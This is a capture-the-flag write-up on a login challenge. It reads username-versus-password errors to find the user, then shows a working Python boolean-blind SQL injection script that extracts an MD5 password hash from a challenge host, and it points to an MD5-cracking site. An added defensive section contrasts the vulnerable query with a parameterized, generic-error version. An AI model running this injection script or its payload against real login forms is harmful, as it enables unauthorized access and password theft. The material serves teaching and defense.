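Approach: I tried username admin with password 123456, and the response said the password was wrong.
I tried username admina with password 123456, and the response said the username was wrong, which shows that the username is admin.
My dictionary-based SQL blind injection could not crack the password, so I found a PyCharm script online written by an expert (remember to install the requests library and change the url).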

import requests
import time

url = "http://114.67.246.176:13918"
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}

with requests.session() as s:
    database = "passwd:"
    s.keep_alive = False
    s.adapters.DEFAULT_RETRIES = 5
    # i: character position in the password column, j: candidate ASCII code
    for i in range(1, 32):
        for j in range(48, 128):
            # ascii(char i) - j is 0 (false) only when j is the right code
            sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i, j)
            data = {'username': sql, 'password': "123"}
            try:
                res = s.post(url, data=data, timeout=5, headers=headers)
            except requests.RequestException:
                # Retry once after a short pause if the request fails
                time.sleep(2)
                res = s.post(url, data=data, timeout=5, headers=headers)
            # A false condition leaves only username 'admi', which does not exist
            if 'username does not exist' in res.text:
                database += chr(j)
                print(database)
                break
            res.close()

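The crack produced passwd:4dcc88f8f1bc05e7c2ad1a60288481a
Running MD5 decryption on 4dcc88f8f1bc05e7c2ad1a60288481a
gave the password bugctf, so I logged in with username admin and password bugctf and got the flag.
Finally, here is a free online MD5 decryption site: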
https://www.somd5.com/
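
A defender's view of the two weaknesses this writeup relies on, as an added example that is not part of the original post or the challenge's code: a login query built by string concatenation that also returns distinguishable username/password errors, next to a version that uses a bound parameter and one generic message. The SQLite table, the "password error" string, the stored password, the two probe strings and the salted PBKDF2 storage are all constructed assumptions for the illustration.

```python
import hashlib, hmac, os, sqlite3

GENERIC = "invalid username or password"
# Constructed probes: same shape, one true condition and one false condition.
PROBE_TRUE, PROBE_FALSE = "admi' or (1=1)--", "admi' or (1=0)--"
_DUMMY = (b"\0" * 16, b"\0" * 32)  # keeps the hashing work equal for unknown users

def make_db():
    # Constructed in-memory table; the password is a placeholder, not the challenge's.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"example-password", salt, 100_000)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", ("admin", salt, pw_hash))
    return conn

def check(row, password):
    # Salted, iterated hash compared in constant time (instead of a bare MD5).
    salt, pw_hash = row
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, pw_hash)

def login_vulnerable(conn, username, password):
    # Weak: input is pasted into the SQL text, and the two failure cases are
    # reported differently, so the reply reveals whether the WHERE clause matched.
    sql = "SELECT salt, pw_hash FROM users WHERE username = '%s'" % username
    row = conn.execute(sql).fetchone()
    if row is None:
        return "username does not exist"
    return "ok" if check(row, password) else "password error"

def login_hardened(conn, username, password):
    # Bound parameter: the input can only be compared as a value, never parsed as SQL.
    sql = "SELECT salt, pw_hash FROM users WHERE username = ?"
    row = conn.execute(sql, (username,)).fetchone()
    ok = check(row or _DUMMY, password) and row is not None
    return "ok" if ok else GENERIC

if __name__ == "__main__":
    conn = make_db()
    for name in (PROBE_TRUE, PROBE_FALSE, "admina", "admin"):
        print(repr(name), "|", login_vulnerable(conn, name, "123"),
              "|", login_hardened(conn, name, "123"))
```

With the hardened function every failed attempt, including both probes, returns the same message, so the response no longer tells the caller whether an injected condition was true or whether the username exists.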